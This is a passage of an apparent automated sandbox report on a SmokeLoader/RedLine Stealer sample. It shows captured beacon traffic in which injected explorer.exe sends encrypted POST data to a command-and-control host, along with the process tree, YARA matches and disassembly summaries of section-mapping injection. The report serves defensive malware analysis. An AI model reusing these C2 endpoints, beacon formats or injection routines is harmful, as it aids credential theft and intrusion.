6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:03.945909977 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ievjgxgogeu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: nwgrus.ru
Oct 14, 2024 10:03:03.945910931 CEST	206	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 76 2d dd e6 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuv-jFSR}Ow>s1g,!PF0'TOBYTiMq)\|1UL4-s6i
Oct 14, 2024 10:03:04.822065115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:04.831216097 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kavychcxkrxbq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: nwgrus.ru
Oct 14, 2024 10:03:04.831258059 CEST	178	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 3c 20 ab f1 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu< MHV{\HvQL>~2s64_2\]M] y"x@d2'G
Oct 14, 2024 10:03:05.614105940 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:05.622786999 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsmkoqlnxxds.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: nwgrus.ru
Oct 14, 2024 10:03:05.622817039 CEST	221	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 59 45 cf e3 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuYE\1BogM<O=3IVD^X&7610D4F9^B4,_>Z9,\|v'@f*zhz
Oct 14, 2024 10:03:06.417629004 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:06.462102890 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gljrhsxnugi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: nwgrus.ru
Oct 14, 2024 10:03:06.462138891 CEST	344	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 33 1e aa b9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[*k,vu3uZNf2J:T5Ai,A0#6&]eJv7Dy&kb2/zhUDEPW!zMFi,TwFA6J:
Oct 14, 2024 10:03:07.311100960 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49772	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:07.320449114 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ublngteflakx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: nwgrus.ru
Oct 14, 2024 10:03:07.320485115 CEST	347	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 62 1d e2 b9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[+k,vubcNG=0V :kx#P6yKL0 uRGz=nTf\|R_,9_WAAm"Jhg,^x
Oct 14, 2024 10:03:08.127748966 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Target ID:	0
Start time:	04:02:09
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\3sfCdeA1H2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3sfCdeA1H2.exe"
Imagebase:	0x400000
File size:	265'728 bytes
MD5 hash:	91BE25F31B7891908A50DFDC9F03F2B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:02:17
Start date:	14/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:02:36
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Roaming\tttcvva
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tttcvva
Imagebase:	0x7ff70f330000
File size:	265'728 bytes
MD5 hash:	91BE25F31B7891908A50DFDC9F03F2B4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs Detection: 38%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:03:39
Start date:	14/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964
Imagebase:	0x7ff6d9380000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:03:42
Start date:	14/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	41.5%
Total number of Nodes:	171
Total number of Limit Nodes:	5

Executed Functions

Function 00417090 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417160
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417179
FindAtomW.KERNEL32(00000000), ref: 00417180
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417188
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004171A0
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004171C7
MoveFileA.KERNEL32(004194C8,004194A8), ref: 004171D7
GetVersionExW.KERNEL32(?), ref: 004171E4
DisconnectNamedPipe.KERNEL32(?), ref: 004171F7
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041723C
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041724B
LCMapStringA.KERNEL32(00000000,00000000,004194D8,00000000,?,00000000), ref: 00417261
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 00417273
OpenFileMappingA.KERNEL32(00000000,00000000,00419508), ref: 00417289
SetCommState.KERNELBASE(00000000,00000000), ref: 004172B4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004172E1
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004172F2
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004172FA
LoadLibraryA.KERNELBASE(00419530), ref: 00417392

Strings

k`, xrefs: 004173C3
}$, xrefs: 004173E7

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: Console$CommFile$ReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectExchangeFindFontInterlockedLengthLibraryLoadMappingModuleMoveNameNamedOpenOutputPathPipeRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2133105460-956986773
Opcode ID: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
Instruction ID: cef9a39308b5a98140bcba38773e80a9b25639b08e6fbc118f284f3ebe5161b8
Opcode Fuzzy Hash: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
Instruction Fuzzy Hash: 2291E372C45528ABC721AB61EC44ADF7B78EF49351F01806EF50AA7150CB381A86CFED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
